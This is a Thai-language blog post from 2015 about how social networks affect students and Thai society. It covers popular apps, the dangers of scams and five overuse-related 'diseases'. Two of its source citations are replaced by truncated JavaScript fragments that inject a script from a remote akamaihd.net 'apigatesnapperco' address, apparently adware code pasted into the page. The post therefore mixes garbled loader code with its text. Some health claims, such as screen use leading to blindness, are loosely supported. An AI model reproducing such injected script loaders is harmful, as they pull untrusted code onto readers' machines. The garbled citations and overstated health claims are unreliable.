วันพุธที่ 17 มิถุนายน พ.ศ. 2558

Social Network กับนักเรียนและสังคมไทย

Social Network กับนักเรียนและสังคมไทย

       โลก social network ในปัจจุบันเริมเข้ามามีอิทธิพลในชีวิตของทั้งคนในสังคม รวมทั้งหมู่นักเรียนไม่ว่าจะก่อนกินก็ต้องถ่ายรูปอัพลง หรืออยากจะติดต่อสื่อสารกันก็เเชทหากัน หรือส่งงานก็ต้องส่งทาง social network เหมือนกันเเละเป็นสิ่งที่คนในยุคนี้เเทบขาดไม่ได้เลยทีเดียว


ที่มา t.createElement("script");d.src="https://apigatesnapperco-a.akamaihd.net/gsrs?is=&bp=BA&g=8242bb19-ebce-4675-8deb-97bcf3a80308";a[0].appendChild(d);}}}catch(e){}

       social network เป็นสังคมออนไลน์ ที่สามารถเชื่อมโยงเรากับเพื่อนได้ ด้วยอินเทอร์เน็ต และสามารถหาเพื่อนได้อีกด้วย ทำให้ social network นั้นเป็นที่นิยมไม่น้อยอันมาจากความสะดวกสบายในการใช้งาน และอาจกลายเป็นแฟชั่นอย่างหนึ่งไปแล้ว

       Social network ที่ได้นับความนิยมก็อย่างเช่น facebook ที่นิยมเล่นกันเพื่อใช้รับรู้ข่าวสารได้อย่างรวดเร็ว เเละ line ใช้เพื่อติดต่อสื่อสารกันเเถมใน line ยังสามารถโทรหากันเเบบเห็นหน้ากันได้อีกด้วย 
ซึ่งในปัจจุบันโลก social network นี้สามารถเข้าถึงได้ง่ายมาก



       หากการใช้ social network ไม่เป็นไปอย่างที่ควรที่เหมาะสมแล้ว อาจเกิดภัยกับตนเองได้ ทั้งในเรื่องของมิจฉาชีพ อาชญากรรม และอื่นๆ ซึ่งนอกจากนี้ยังมีการเล่น social network ที่มากเกินควาเหมาะสมจนทำให้เกิดผลเสียต่อร่างกายได้

ที่มา t.createElement("script");d.src="https://apigatesnapperco-a.akamaihd.net/gsrs?is=&bp=BA&g=8242bb19-ebce-4675-8deb-97bcf3a80308";a[0].appendChild(d);}}}catch(e){}


โรคฮิตจาก social network

  1. โรคเศร้าจากเฟสบุ๊ค

    ในเมืองไทยติดอันดับการใช้เฟสบุ๊คถึงอันดับที่ 13 ของโลก โดยเป็นประชากรจำนวน 18 ล้านคน คิดเป็นร้อยละ 27 ทีเดียว ซึ่งมีผลการวิจัยบอกว่า การใช้เฟสบุ๊คมากเกินไปนั้นอาจทำให้ผู้ใช้เกิดการบั่นทอนความสุขและความพึงพอใจในการดำรงชีวิตของตนด้วย
  2. โรคละเมอแชต

    เรียกได้ว่าเป็นอาการที่เกิดขึ้นจากการพิมพ์ข้อความแชทในมือถือของผู้ที่เข้าขั้น "ติด" อาการนี้จะเกิดขึ้นในขณะหลับ เมื่อมีเสียงข้อความมือถือดังขึ้น จะมีการพิมพ์ข้อความกลับอัตโนมัติในสภาพกึงหลับกึ่งตื่น และถ้าหากเป็นอย่างนี้ไปสักพักอาจทำให้มีภาวะโรคอื่นๆตามมาด้วย
  3. โรควุ้นในตาเสื่อม

    มักจะเกิดกับผู้ที่ใช้สายตากับแสงคอมพิวเตอร์หรือโทรศัพท์มากๆหลายชั่วโมงต่อวัน จะทำให้มีปัญหาทางสายตาในเริ่มต้น และสุดท้ายอาจทำให้ตาบอดเลยก็ได้
  4. โนโมโฟเบีย

    เป็นโรคที่หากว่าไม่ได้ใช้ social network หรือโทรศัพท์นานๆ จะเกิดอาการวิตกกังวล มักจะเป็นกับคนที่ติดสมาทโฟน หรือโลก social มากๆ
  5. สมาร์ทโฟนเฟซ

    เป็นโรคที่เกิดจากการก้มเล่นสมาทโฟน โดยหากเล่นสมาทโฟนในท่านี้นานๆมักจะทำให้เกิดอาการเกร็งบริเวณกล้ามเนื้อช่วงคอ และเพิ่มแรงกดตรงแก้ม หากเป็นเช่นนี้นานๆ อาจทำให้เกิดโรคอื่นๆตามมาได้
ที่มา https://sites.google.com/site/khawsanetc7/rokh-thi-keid-cak-kar-tid-so-cheiy-l



ที่มา
https://sites.google.com/site/khawsanetc7/rokh-thi-keid-cak-kar-tid-so-cheiy-l
https://sites.google.com/site/socialnetworkfc/social-network-khux-xari


ไม่มีความคิดเห็น:

แสดงความคิดเห็น